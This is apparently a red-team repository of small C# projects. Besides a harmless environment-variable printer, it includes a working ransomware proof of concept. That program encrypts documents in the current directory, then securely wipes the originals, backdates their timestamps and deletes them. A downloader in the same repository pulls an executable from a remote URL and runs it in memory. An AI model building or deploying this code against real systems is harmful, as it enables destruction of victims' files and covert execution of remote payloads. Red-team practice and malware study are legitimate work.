├── GetEnv
    ├── GetEnv.sln
    ├── GetEnv
    │   ├── GetEnv.cs
    │   ├── GetEnv.csproj
    │   └── Properties
    │   │   └── AssemblyInfo.cs
    └── README.md
├── README.md
├── Ransomware_Example
    ├── README.md
    ├── Ransomware_Example.sln
    └── Ransomware_Example
    │   ├── Properties
    │       └── AssemblyInfo.cs
    │   ├── Ransomware_Example.cs
    │   └── Ransomware_Example.csproj
└── SharpDownloader.cs


/GetEnv/GetEnv.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 14
 4 | VisualStudioVersion = 14.0.25420.1
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetEnv", "GetEnv\GetEnv.csproj", "{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | EndGlobal
23 | 


--------------------------------------------------------------------------------
/GetEnv/GetEnv/GetEnv.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | 
 3 | namespace GetEnv
 4 | {
 5 | 	class GetEnv
 6 | 	{
 7 | 		private static void Main(string[] args)
 8 | 		{
 9 | 			foreach (System.Collections.DictionaryEntry entry in Environment.GetEnvironmentVariables())
10 | 			{
11 | 				Console.WriteLine(entry.Key + "=" + entry.Value);
12 | 			}
13 | 		}
14 | 	}
15 | }


--------------------------------------------------------------------------------
/GetEnv/GetEnv/GetEnv.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{D1421BA3-C60B-42A0-98F9-92BA4E653F3D}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
10 |     <RootNamespace>GetEnv</RootNamespace>
11 |     <AssemblyName>GetEnv</AssemblyName>
12 |     <TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
13 |     <FileAlignment>512</FileAlignment>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Data" />
37 |     <Reference Include="System.Xml" />
38 |   </ItemGroup>
39 |   <ItemGroup>
40 |     <Compile Include="GetEnv.cs" />
41 |     <Compile Include="Properties\AssemblyInfo.cs" />
42 |   </ItemGroup>
43 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
44 |   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
45 |        Other similar extension points exist, see Microsoft.Common.targets.
46 |   <Target Name="BeforeBuild">
47 |   </Target>
48 |   <Target Name="AfterBuild">
49 |   </Target>
50 |   -->
51 | </Project>


--------------------------------------------------------------------------------
/GetEnv/GetEnv/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following 
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("GetEnv")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("GetEnv")]
13 | [assembly: AssemblyCopyright("Copyright ©  2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible 
18 | // to COM components.  If you need to access a type in this assembly from 
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("d1421ba3-c60b-42a0-98f9-92ba4e653f3d")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version 
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers 
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/GetEnv/README.md:
--------------------------------------------------------------------------------
1 | # GetEnv
2 | This binary will loop through and print all environment variables.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Misc-CSharp
2 | Miscellaneous C-Sharp projects for red team activities
3 | 


--------------------------------------------------------------------------------
/Ransomware_Example/README.md:
--------------------------------------------------------------------------------
1 | # Ransomware_Example
2 | This binary is a simple PoC that will encrypt all files of specific types in the current working directory. It currently uses a hard-coded key and target file extension list.
3 | 


--------------------------------------------------------------------------------
/Ransomware_Example/Ransomware_Example.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 14
 4 | VisualStudioVersion = 14.0.25420.1
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Ransomware_Example", "Ransomware_Example\Ransomware_Example.csproj", "{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | EndGlobal
23 | 


--------------------------------------------------------------------------------
/Ransomware_Example/Ransomware_Example/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following 
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("Ransomware_Example")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Ransomware_Example")]
13 | [assembly: AssemblyCopyright("Copyright ©  2018")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible 
18 | // to COM components.  If you need to access a type in this assembly from 
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version 
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers 
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/Ransomware_Example/Ransomware_Example/Ransomware_Example.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.IO;
  3 | using System.Text;
  4 | using System.Security.Cryptography;
  5 | 
  6 | namespace Ransomware_Example
  7 | {
  8 | 	class Ransomware_Example
  9 | 	{
 10 | 		public static void Main(string[] args)
 11 |         {
 12 |             try
 13 |             {
 14 | 				string [] fileEntries = Directory.GetFileSystemEntries (System.IO.Directory.GetCurrentDirectory());
 15 | 				foreach (string fileName in fileEntries)
 16 | 				{
 17 | 					if (fileName.Contains(".doc") || fileName.Contains(".xls") || fileName.Contains(".ppt") || fileName.Contains(".pdf") || fileName.Contains(".txt"))
 18 | 					{
 19 | 						var InFileName = fileName;
 20 | 						var OutFileName = InFileName + ".enc";
 21 | 						Console.WriteLine("Encrypting " + InFileName);
 22 | 						EncryptFile(InFileName, OutFileName);
 23 | 						WipeFile(InFileName, 3);
 24 | 					}
 25 | 				}
 26 |                 Console.WriteLine("Done");
 27 |             }
 28 |             catch (Exception e)
 29 |             {	
 30 |                 Console.WriteLine(e);
 31 |             }
 32 |             Console.ReadLine();
 33 |         }
 34 | 
 35 |         // Encrypt a file.
 36 | 		private static void EncryptFile(string inputFile, string outputFile)
 37 | 		{
 38 | 			string password = @"password"; // Your Key Here
 39 | 			UnicodeEncoding UE = new UnicodeEncoding();
 40 | 			byte[] key = UE.GetBytes(password);
 41 | 
 42 | 			string cryptFile = outputFile;
 43 | 			FileStream fsCrypt = new FileStream(cryptFile, FileMode.Create);
 44 | 
 45 | 			RijndaelManaged RMCrypto = new RijndaelManaged();
 46 | 
 47 | 
 48 | 			CryptoStream cs = new CryptoStream(fsCrypt,
 49 | 				RMCrypto.CreateEncryptor(key, key),
 50 | 				CryptoStreamMode.Write);
 51 | 
 52 | 			FileStream fsIn = new FileStream(inputFile, FileMode.Open);
 53 | 
 54 | 			int data;
 55 | 			while ((data = fsIn.ReadByte()) != -1)
 56 | 				cs.WriteByte((byte)data);
 57 |         
 58 | 			fsIn.Close();
 59 | 			cs.Close();
 60 | 			fsCrypt.Close();
 61 | 		}
 62 | 
 63 | 		private static void WipeFile(string filename, int timesToWrite)
 64 | 		{
 65 | 			if (File.Exists(filename))
 66 | 			{
 67 | 				// Set the files attributes to normal in case it's read-only.
 68 | 				File.SetAttributes(filename, FileAttributes.Normal);
 69 | 
 70 | 				// Calculate the total number of sectors in the file.
 71 | 				double sectors = Math.Ceiling(new FileInfo(filename).Length / 512.0);
 72 | 
 73 | 				// Create a dummy-buffer the size of a sector.
 74 | 				byte[] dummyBuffer = new byte[512];
 75 | 
 76 | 				// Create a cryptographic Random Number Generator.
 77 | 				// This is what I use to create the garbage data.
 78 | 				RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider();
 79 | 
 80 | 				// Open a FileStream to the file.
 81 | 				FileStream inputStream = new FileStream(filename, FileMode.Open);
 82 | 				for (int currentPass = 0; currentPass < timesToWrite; currentPass++)
 83 | 				{
 84 | 					// Go to the beginning of the stream
 85 | 					inputStream.Position = 0;
 86 | 
 87 | 					// Loop all sectors
 88 | 					for (int sectorsWritten = 0; sectorsWritten < sectors; sectorsWritten++)
 89 | 					{
 90 | 						// Fill the dummy-buffer with random data
 91 | 						rng.GetBytes(dummyBuffer);
 92 | 
 93 | 						// Write it to the stream
 94 | 						inputStream.Write(dummyBuffer, 0, dummyBuffer.Length);
 95 | 					}
 96 | 				}
 97 | 
 98 | 				// Truncate the file to 0 bytes.
 99 | 				// This will hide the original file-length if you try to recover the file.
100 | 				inputStream.SetLength(0);
101 | 
102 | 				// Close the stream.
103 | 				inputStream.Close();
104 | 
105 | 				// As an extra precaution I change the dates of the file so the
106 | 				// original dates are hidden if you try to recover the file.
107 | 				DateTime dt = new DateTime(2037, 1, 1, 0, 0, 0);
108 | 				File.SetCreationTime(filename, dt);
109 | 				File.SetLastAccessTime(filename, dt);
110 | 				File.SetLastWriteTime(filename, dt);
111 | 
112 | 				// Finally, delete the file
113 | 				File.Delete(filename);
114 | 			}
115 | 		}
116 |     }
117 | }


--------------------------------------------------------------------------------
/Ransomware_Example/Ransomware_Example/Ransomware_Example.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="14.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{2AFAC0DD-F46F-4F95-8A93-DC17B4F9A3A1}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
10 |     <RootNamespace>Ransomware_Example</RootNamespace>
11 |     <AssemblyName>Ransomware_Example</AssemblyName>
12 |     <TargetFrameworkVersion>v2.0</TargetFrameworkVersion>
13 |     <FileAlignment>512</FileAlignment>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Data" />
37 |     <Reference Include="System.Xml" />
38 |   </ItemGroup>
39 |   <ItemGroup>
40 |     <Compile Include="Ransomware_Example.cs" />
41 |     <Compile Include="Properties\AssemblyInfo.cs" />
42 |   </ItemGroup>
43 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
44 |   <!-- To modify your build process, add your task inside one of the targets below and uncomment it. 
45 |        Other similar extension points exist, see Microsoft.Common.targets.
46 |   <Target Name="BeforeBuild">
47 |   </Target>
48 |   <Target Name="AfterBuild">
49 |   </Target>
50 |   -->
51 | </Project>


--------------------------------------------------------------------------------
/SharpDownloader.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.IO;
 3 | using System.Net;
 4 | using System.Reflection;
 5 | using System.IO.Compression;
 6 | 
 7 | namespace AssemblyLoader;
 8 | 
 9 | public class SharpDownloader
10 | {
11 |     public static async Task Main(string[] args)
12 |     {
13 |         string _url = "https://raw.githubusercontent.com/Flangvik/SharpCollection/master/NetFramework_4.0_Any/SharpDir.exe";
14 |         await GetAndExecute(_url);
15 |         //string _url = "{Created With Compress-CSharp-Exe-For-PowerShell.ps1}";
16 |         //await GetCompressedAndExecute(_url);
17 |     }
18 | 
19 |     public static async Task GetAndExecute(string _url)
20 |     {
21 |         HttpClient client = new HttpClient();
22 |         HttpResponseMessage response = await client.GetAsync(_url);
23 |         response.EnsureSuccessStatusCode();
24 |         Byte[] bytes = await response.Content.ReadAsByteArrayAsync();
25 |         //File.WriteAllBytes("outputStream.exe", bytes);
26 |         ExecuteAssembly(bytes, new string[] { ".", "*.exe" });
27 |     }
28 | 
29 |     public static async Task GetCompressedAndExecute(string _url)
30 |     {
31 |         HttpClient client = new HttpClient();
32 |         HttpResponseMessage response = await client.GetAsync(_url);
33 |         response.EnsureSuccessStatusCode();
34 |         string responseBody = await response.Content.ReadAsStringAsync();
35 |         Byte[] bytes = Convert.FromBase64String(responseBody);
36 |         using(MemoryStream memStream = new MemoryStream(bytes.Length))
37 |         {
38 |             memStream.Write(bytes, 0 , bytes.Length);
39 |             memStream.Seek(0, SeekOrigin.Begin);
40 |             var outputStream = new MemoryStream();
41 |             using var zipStream = new GZipStream(memStream, CompressionMode.Decompress, false);
42 |             {
43 |                 await zipStream.CopyToAsync(outputStream);
44 |                 //File.WriteAllBytes("outputStream.exe", outputStream.ToArray());
45 |                 ExecuteAssembly(outputStream.ToArray(), new string[] { ".", "*.exe" });
46 |             }
47 |         } 
48 |     }
49 | 
50 |     public static void ExecuteAssembly(Byte[] assemblyBytes, string[] param)
51 |     {
52 |         Assembly assembly = Assembly.Load(assemblyBytes);
53 |         MethodInfo method = assembly.EntryPoint;
54 |         object[] parameters = new[] { param };
55 |         object execute = method.Invoke(null, parameters);
56 |     }
57 | }
58 | 


--------------------------------------------------------------------------------